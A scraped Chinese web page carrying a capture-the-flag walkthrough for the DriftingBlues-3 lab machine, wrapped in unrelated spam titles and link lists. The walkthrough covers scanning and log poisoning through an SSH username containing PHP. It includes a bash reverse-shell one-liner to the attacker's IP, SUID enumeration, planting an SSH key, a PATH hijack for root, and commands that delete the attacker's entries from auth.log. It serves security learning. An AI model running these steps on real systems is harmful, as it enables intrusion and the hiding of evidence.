当前位置: 首页 > news >正文

安平县网站建设做我的奴隶腾讯网站

安平县网站建设,做我的奴隶腾讯网站,做的好的手机网站有哪些内容,网站的需求分析怎么写前言 靶机:DriftingBlues-3,IP地址192.168.1.60 攻击:kali,IP地址192.168.1.16 都采用虚拟机,网卡为桥接模式 主机发现 使用arp-scan -l或netdiscover -r 192.168.1.1/24 信息收集 使用nmap扫描端口 网站探测 访…

前言

靶机:DriftingBlues-3,IP地址192.168.1.60

攻击:kali,IP地址192.168.1.16

都采用虚拟机,网卡为桥接模式

主机发现

使用arp-scan -lnetdiscover -r 192.168.1.1/24

信息收集

使用nmap扫描端口

网站探测

访问80端口,并查看页面源码,发现有图片等信息,可能是网站型目录

使用gobuster、dirsearch、ffuf、dirb、dirbuster等工具扫描目录

gobuster dir -u http://192.168.1.60 -w /usr/share/wordlists/dirb/big.txt -x php,zip,md,txt,html,jpg -b 404 -d

访问robots.txt,发现eventadmins/目录

访问drual、phpmyadmin、privacy,发现都是信息ABCABCD

访问secret

访问wp-admin

访问eventadmins/目录

翻译一下,发现/littlequeenofspades.html页面

访问/eventadmins

漏洞寻找

查看页面源代码,发现编码aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码这个

访问/adminsfixit.php,发现是ssh连接的认证日志,通过测试发现确实会记录ssh登录时的用户名、地址和端口

ssh test@192.168.1.60

尝试连接,修改ssh连接时的用户为php脚本,测试是否可以

访问页面

测试是否可行

漏洞利用

尝试使用bash命令反弹

bash -c 'bash -i >& /dev/tcp/192.168.1.16/9999 0>&1'
进行URL编码
bash+-i+>%26+%2fdev%2ftcp%2f192.168.1.16%2f9999+0>%261%0a

kali中开启监听,然后使用浏览器执行上面的反弹命令

靶机内信息收集

使用find寻找具有SUID权限和capabilites

find / -perm -4000 -print 2>/dev/null
find / -type f -executable 2>/dev/null | xagrs getcap -r 2>/dev/null

查看定时任务

cat /etc/crontab

查看网络状态信息

查看备份文件夹,看有无信息

使用find寻找其他用户具有可写权限

find /home -perm /2 2>/dev/null
-perm /2   是指其他用户具有可写权限,/2是指写权限

查看这个目录,发现具有写权限

提权

提权至robertj

kali生成ssh的公私钥

然后把公钥id_rsa.pub上传到这个目录下,改名为authorized_keys

然后使用ssh私钥连接

之前使用find寻找具有SUID权限文件,发现getinfo,在linux中并无该命令,测试该命令

把这个文件下载到kali

scp robertj@192.168.1.60:/usr/bin/getinfo ./

使用strings命令查看

提权至root

那么可以使用export设置临时变量的优先目录,最好在/tmp目录

编写脚本提权

echo "/bin/bash" > ip

查看flag

清除痕迹

清理日志

sed -i "/192.168.1.16/d" auth.log

删除之前生成的公钥

清除命令历史记录

总结

  1. 主要考证日志文件的利用,这里就是利用验证登录日志auth.log通过adminsfixit.php文件展露
  2. 然后就是考察ssh公私钥的使用
  3. 考察临时环境变量的优先级目录
http://www.yayakq.cn/news/376036/

相关文章:

  • 收录很快的推广网站wordpress作者墙主题
  • 搜索型网站私人订制网站建设
  • seo对企业网站运营有何意义化妆品 网站建设案例
  • 网站打不开怎么办安徽省建设厅官方网站黄世山
  • 安徽网站关键字优化深圳市罗湖建设局网站
  • 上那个网站找手工活做电商平台管理系统
  • 建设网站号码是多少如何接推广的单子
  • 个人响应式网站怎样做网络推广甄选广州豪升网络
  • 网站建设首页布局快速建手机网站
  • “网站制作”聚合影视网站建设
  • 浙江网站建设费用wordpress主题大前端dux去授权
  • 深圳龙霸网站建设物三网站制作公司备案
  • 石家庄行业网站网站上如何放入地图
  • 网站做收录什么方法快嘉定网站设计制作公司
  • 海南网站建设网站开发推广平台有哪些技巧和方法
  • 花溪建设村镇银行官方网站wordpress 不同权限
  • 宁波网站建设兼职北京家装公司十大排名
  • 烟台网站建设给力臻动传媒无锡网站建设哪家好
  • 网站优化招商网站建设策划书附录
  • 合肥建站方案开个公司做购物网站
  • 贵阳快速建站模板网站建设推进会
  • 有什么好的网站做数学题吗网站服务器人多怎么挤进去
  • 医疗网站设计方案t天津建设工程信息网
  • 网站贸易表格怎么做电子商务网站建设期中
  • 网站为什么维护中做seo推广公司
  • 个人音乐网站程序购物网站后台设计
  • 猪八戒网做网站如何付款wordpress 重写 函数
  • 天津网站建设培训课件什么是前端开发和后端开发
  • 三点水网站建设合同最近的电脑培训班在哪里
  • 东莞哪家公司做网站好南川区 网站集约化建设方案